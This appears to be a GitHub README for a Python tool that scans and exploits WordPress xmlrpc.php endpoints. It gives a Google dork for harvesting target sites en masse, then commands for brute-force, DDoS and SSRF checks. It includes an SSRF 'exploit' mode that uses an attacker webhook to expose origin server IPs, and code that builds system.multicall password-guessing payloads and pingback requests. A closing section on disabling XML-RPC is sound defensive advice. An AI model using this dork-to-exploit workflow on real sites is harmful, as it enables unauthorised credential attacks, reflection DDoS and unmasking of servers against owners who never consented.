A powerful and automated XML-RPC vulnerability Scanner and Exploitation script written in Python. Designed to detect and test for multiple security risks in WordPress xmlrpc.php file

WhiteeRabbit/xmlrpc-exploit


🔍 XMLRPC Vulnerability Scanner

❗ This tool is for educational and testing purposes only.

❗ Do not use it on websites without permission.

📖 What is this?

This is a simple Python script that helps you find and test WordPress websites for security issues in the xmlrpc.php file.

WordPress uses this file for its XML-RPC API (remote publishing, pingbacks, the mobile apps and Jetpack), but the same methods can be abused by attackers when the endpoint is left open and unmonitored.

This tool helps you:

  • Find sites using xmlrpc.php
  • Clean and prepare the URLs
  • Check for vulnerabilities: brute force, DDoS, IP disclosure and blind SSRF
  • Learn how to protect your site from these risks

🚀 How to Use This Tool

✅ Installing Requirements

Before running the script, make sure Python is installed on your system.

To check, run python3 --version or python --version in a terminal (or cmd on Windows). Once Python is ready, install the required libraries:

pip install -r requirements.txt

✅ Step 1: Find websites with xmlrpc.php

Before we check for any problems, we first need to find websites that have xmlrpc.php.

You can search on Google using a dork. For example:

inurl:"/xmlrpc.php?rsd" & ext:php

This will show you many websites that look like this:

https://example.com/xmlrpc.php?rsd

💡 To make this easier, I made another program that does the hard work for you. It finds sites and saves them for you automatically:

👉 Download the Dork Seeker

🔁 Step 2: Clean the URLs

After you collect the list of websites from Step 1, you’ll notice that the links look like this:
https://example.com/xmlrpc.php?rsd

But for our tests to work, the link must look like this:

https://example.com/xmlrpc.php

The problem is that ?rsd is appended to every link, and the checks need the bare endpoint. To fix this, use the Python script xmlrpc.py with its --filter option.

The script strips `?rsd` from every link, so instead of fixing each URL by hand you get a clean list in one pass.

How to use this script:

usage: xmlrpc.py [-h] -l LIST [-f] [-s] [-b] [-d] [-e]
                 [-w WEBHOOK] [-x]

Tool to explore vulnerabilities in xmlrpc.php. The author takes no
responsibility for any misuse. Use at your own risk!

options:
  -h, --help            show this help message and exit
  -l LIST, --list LIST  Path to URL list file (e.g., filtered.txt)
  -f, --filter          Filter '?rsd' from URLs
  -s, --ssrf            Check if site supports SSRF via
                        'pingback.ping'
  -b, --brute_check     Check for XML-RPC brute-force capable
                        methods
  -d, --ddos_check      Check if site is vulnerable to XML-RPC
                        DDoS
  -e, --exploit         Exploit SSRF vulnerability (requires
                        --webhook)
  -w WEBHOOK, --webhook WEBHOOK
                        Webhook for SSRF exploit
  -x, --examples        Show usage examples and Contacts

Filter urls:

python3 xmlrpc.py --list results.txt --filter

✅ After running the script, you will get a new file called filtered.txt. It contains all the fixed URLs with the ?rsd part removed.

Now your list is clean and ready to use. You can start checking the sites for vulnerabilities: brute force, DDoS, IP disclosure and SSRF (blind and full).
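The URL cleaning described in this step, written out as an added example. This is not the project's xmlrpc.py; it is a stand-alone normaliser that drops the query string and fragment, lower-cases the host, rejects lines that do not end in /xmlrpc.php, and removes duplicates. The input lines are constructed to show the variants a dork export typically contains (plain ?rsd, ?rsd=1, a fragment, mixed-case hosts, a non-xmlrpc page and a junk line).

```python
# Added example, not the project's xmlrpc.py: normalise dork results to bare
# https://host/path/xmlrpc.php endpoints so every later check hits the same URL.
from typing import Optional
from urllib.parse import urlsplit, urlunsplit

# Constructed sample input, the kind of lines a Google dork export produces.
SAMPLE_RESULTS = """\
https://example.com/xmlrpc.php?rsd
https://Example.com/xmlrpc.php?rsd#top
http://example.com/xmlrpc.php?rsd=1
https://blog.example.org/wp/xmlrpc.php?rsd
https://example.net/about.php
not a url at all
"""


def normalize_xmlrpc_url(line: str) -> Optional[str]:
    """Return the bare xmlrpc.php URL for one dork result, or None if it is not one.

    Drops the query string (?rsd, ?rsd=1, ...) and any fragment, lower-cases the
    host, and rejects lines whose path does not end in /xmlrpc.php.
    """
    line = line.strip()
    if not line:
        return None
    parts = urlsplit(line)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return None
    if not parts.path.endswith("/xmlrpc.php"):
        return None
    return urlunsplit((parts.scheme, parts.netloc.lower(), parts.path, "", ""))


def filter_urls(text: str) -> list:
    """Normalise every line and return the unique endpoints in first-seen order.

    http:// and https:// versions of the same host are kept as two entries on
    purpose: they may be served by different front ends.
    """
    seen = {}
    for line in text.splitlines():
        url = normalize_xmlrpc_url(line)
        if url:
            seen.setdefault(url, None)
    return list(seen)


if __name__ == "__main__":
    for url in filter_urls(SAMPLE_RESULTS):
        print(url)
```

Pipe your dork output through filter_urls() and write the result to filtered.txt; the rest of the steps expect exactly that URL form.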

💣 Step 3: Test for VULNS

Now that your filtered.txt file is ready, you can begin testing the websites to see if they are vulnerable.

✅This tool lets you check for 3 common vulnerabilities in xmlrpc.php:

  • 🔐 Brute Force – This test checks whether the site exposes XML-RPC methods that take a username and password (for example wp.getUsersBlogs) and whether system.multicall is available. With system.multicall an attacker packs hundreds of login attempts into one HTTP request, so guessing is far faster than one attempt per request against the normal wp-login.php form. A site that exposes both is an easy target for brute-force attacks.

  • 🌐 DDoS – This test checks whether the site can be drawn into an XML-RPC denial-of-service attack. That works in two directions: an attacker can flood xmlrpc.php directly with expensive calls (system.multicall amplifies this too), or use pingback.ping on many WordPress sites to make them all fetch a victim URL at once (reflection). If the site answers these calls without rate limiting, it can be slowed down or crashed, and it can be turned against other sites.

  • 🕵️ SSRF (Server-Side Request Forgery) – This check tests for blind SSRF through pingback.ping. The request names your webhook URL as the pingback source, so the server itself tries to fetch it. A hit on your webhook proves the server makes outbound requests on an attacker's behalf. It is called blind because the server does not return the fetched content to you, only a fault message; you observe its action through the webhook. The same hit also discloses the real IP address of the server (the origin behind any CDN or WAF), which is the IP disclosure issue listed above. If the server can be made to request internal addresses (for example 127.0.0.1) and the response, or a difference in fault messages, reveals what it found there, this becomes full SSRF: attackers can reach internal services, read data from internal HTTP endpoints and bypass network controls that assume requests come from outside. Caveat: since WordPress 3.5.1 the source URL is fetched with wp_safe_remote_get(), which refuses loopback and private-range hosts unless a site filter allows them, so the internal-address case mostly applies to old or customised installs; the outbound (blind) case still works on a default install that accepts pingbacks.
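The three checks above all come down to a few XML-RPC messages and the way WordPress answers them. The following is an added example, not code from the project: it builds a system.listMethods-style capability check, the pingback.ping request used for the SSRF and reflection checks, and the system.multicall payload that makes brute force cheap, and it decodes the fault codes WordPress returns from pingback_ping so you can tell whether the server actually tried to fetch your URL. It also classifies the replies you expect after hardening (403 from the web server, fault 405 from WordPress). The responses embedded below are constructed samples, the canary and target URLs are placeholders, and nothing here sends network traffic; a real check would POST these bytes to the site's /xmlrpc.php.

```python
# Added example, not the project's xmlrpc.py: build the XML-RPC requests the
# three checks rely on and interpret WordPress's replies. It runs offline; the
# responses below are constructed samples of what a WordPress site returns.
import xml.etree.ElementTree as ET
from typing import List, Optional, Tuple
from xml.sax.saxutils import escape

# Methods that take a username/password pair. Combined with system.multicall,
# one HTTP request can carry hundreds of guesses (the brute-force amplifier).
CREDENTIAL_METHODS = ("wp.getUsersBlogs", "wp.getCategories", "metaWeblog.getUsersBlogs")

# What a pingback.ping fault tells you. Only a hit on your webhook proves the
# server connected out; faults 0, 33 and 48 are returned before any fetch.
PINGBACK_FAULTS = {
    0: "source and target are the same URL, nothing fetched",
    16: "fetch attempted but no body came back (or wp_safe_remote_get refused the host)",
    17: "source fetched and parsed, it does not link to the target",
    33: "target is not a pingback-enabled post, nothing fetched",
    48: "pingback already registered for this source, nothing fetched",
}

# Constructed sample responses (not captured from any real site).
SAMPLE_LIST_METHODS = b"""<?xml version="1.0"?><methodResponse><params><param><value><array><data>
<value><string>system.multicall</string></value><value><string>system.listMethods</string></value>
<value><string>pingback.ping</string></value><value><string>wp.getUsersBlogs</string></value>
<value><string>demo.sayHello</string></value>
</data></array></value></param></params></methodResponse>"""
SAMPLE_PINGBACK_FAULT = b"""<?xml version="1.0"?><methodResponse><fault><value><struct>
<member><name>faultCode</name><value><int>16</int></value></member>
<member><name>faultString</name><value><string>The source URL does not exist.</string></value></member>
</struct></value></fault></methodResponse>"""
SAMPLE_DISABLED = b"""<?xml version="1.0"?><methodResponse><fault><value><struct>
<member><name>faultCode</name><value><int>405</int></value></member>
<member><name>faultString</name><value><string>XML-RPC services are disabled on this site.</string></value></member>
</struct></value></fault></methodResponse>"""


def build_call(method: str, *params: str) -> bytes:
    """Serialise one methodCall whose parameters are all strings."""
    body = "".join(f"<param><value><string>{escape(p)}</string></value></param>" for p in params)
    return (f'<?xml version="1.0"?><methodCall><methodName>{method}</methodName>'
            f"<params>{body}</params></methodCall>").encode()


def build_pingback(canary_url: str, target_post_url: str) -> bytes:
    """pingback.ping(sourceURI, targetURI): the server fetches sourceURI itself."""
    return build_call("pingback.ping", canary_url, target_post_url)


def build_multicall(username: str, passwords: List[str]) -> bytes:
    """Pack many wp.getUsersBlogs logins into a single system.multicall request."""
    calls = "".join(
        "<value><struct><member><name>methodName</name>"
        "<value><string>wp.getUsersBlogs</string></value></member>"
        "<member><name>params</name><value><array><data>"
        f"<value><string>{escape(username)}</string></value>"
        f"<value><string>{escape(pw)}</string></value>"
        "</data></array></value></member></struct></value>"
        for pw in passwords)
    return (b'<?xml version="1.0"?><methodCall><methodName>system.multicall</methodName>'
            b"<params><param><value><array><data>" + calls.encode() +
            b"</data></array></value></param></params></methodCall>")


def parse_fault(xml: bytes) -> Optional[Tuple[int, str]]:
    """Return (faultCode, faultString) for a fault response, None otherwise."""
    try:
        root = ET.fromstring(xml)
    except ET.ParseError:
        return None
    fault = root.find("fault")
    if fault is None:
        return None
    code = fault.find(".//member[name='faultCode']/value/int")
    text = fault.find(".//member[name='faultString']/value/string")
    if code is None:
        return None
    return int(code.text), (text.text if text is not None and text.text else "")


def parse_string_array(xml: bytes) -> List[str]:
    """Collect every <string> value of a successful response (system.listMethods)."""
    return [e.text for e in ET.fromstring(xml).iter("string") if e.text]


def brute_force_capable(methods: List[str]) -> dict:
    """Flag the combination the -b check is after: credential methods plus multicall."""
    exposed = [m for m in CREDENTIAL_METHODS if m in methods]
    multicall = "system.multicall" in methods
    return {"credential_methods": exposed, "multicall": multicall,
            "amplified_brute_force": bool(exposed) and multicall}


def xmlrpc_disabled(http_status: int, body: bytes) -> bool:
    """Post-hardening check: 403 from the web server, or fault 405 from WordPress."""
    if http_status == 403:
        return True
    fault = parse_fault(body) if http_status == 200 else None
    return fault is not None and fault[0] == 405


if __name__ == "__main__":
    methods = parse_string_array(SAMPLE_LIST_METHODS)
    print("exposed methods:", methods)
    print("brute force:", brute_force_capable(methods))
    # Placeholder canary and target; a real run POSTs these bytes to /xmlrpc.php.
    print(build_pingback("https://CANARY.webhook.site/", "https://example.com/?p=1").decode())
    code, text = parse_fault(SAMPLE_PINGBACK_FAULT)
    print(f"pingback fault {code} ({text}): {PINGBACK_FAULTS.get(code, 'unknown')}")
    print("xmlrpc disabled:", xmlrpc_disabled(200, SAMPLE_DISABLED))
```

Two things the fault table makes explicit: a fault 16 or 17 on its own is not proof of SSRF (16 is also what a blocked private-range host produces), so always pair the request with the webhook hit; and pingback.ping needs a targetURI that resolves to a real, pingback-enabled post on the site, otherwise you get fault 33 and the server never connects out.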

⚔️ Check and exploit vulnerabilities

⚔ Check for SSRF:

python3 xmlrpc.py -l filtered.txt --ssrf

| Option | Description |
| --- | --- |
| -l, --list | Text file of URLs without the ?rsd ending (filtered.txt) |
| -s, --ssrf | Check for SSRF via pingback.ping |

💥 Exploit SSRF (requires webhook):

python3 xmlrpc.py -l may_vulnerable.txt -e --webhook YOUR_WEBHOOK

| Option | Description |
| --- | --- |
| -l, --list | Text file of the sites that passed the SSRF check |
| -e, --exploit | Try to exploit the vulnerability |
| -w, --webhook | Listener that receives the server's callback: a webhook.site URL or a Burp Collaborator payload |

For webhook.site, use the "Your unique DNS name" option from https://webhook.site/ as the webhook; Burp Collaborator works the same way. Every hit also logs the connecting IP address, which is the origin server behind any CDN or WAF.

🛡️ Step 4: How to prevent xmlrpc attacks

The simplest protection is to disable xmlrpc.php. Before you do, check that nothing you rely on needs it: the WordPress mobile apps, Jetpack and remote-publishing clients all talk to the site through XML-RPC. If you must keep it, rate limit xmlrpc.php and block the pingback.ping method rather than leaving the endpoint wide open.

There are four ways to disable xmlrpc.php:

  • 1) Installing a plugin is the easiest way. The Disable XML-RPC plugin turns it off completely.

  • 2) Disable it via a filter. Use the xmlrpc_enabled filter; add this line to a plugin and activate it on your site:

add_filter( 'xmlrpc_enabled', '__return_false' );

You could add this to your theme's functions.php, but it is better practice to write a small plugin so the setting survives a theme change. Note that this filter only disables the methods that require authentication; WordPress still answers pingback.ping and system.listMethods, so on its own it does not stop the pingback-based SSRF and reflection checks above.

  • 3) Disable it via the .htaccess file. On Apache 2.4, add this to your .htaccess:

<Files "xmlrpc.php">
  Require all denied
</Files>

This blocks every request, pingbacks included, and returns 403. It only works on Apache with AllowOverride enabled for the site; on nginx the equivalent is a deny rule for the same path in the server block.

  • 4) Alternatively, some hosting providers disable xmlrpc.php automatically when an attack is detected. This produces a 403 error and stops the attack in its tracks.

📫 Contact

Made with ❤️ by WhiteeRabbit
Feel free to open an issue or contact me for suggestions!

📃 License:

LICENSE

🙏🏻 Big thanks to everyone who gave a ⭐️ to this project or helped in any way.

Your support means a lot and keeps this kind of work going!
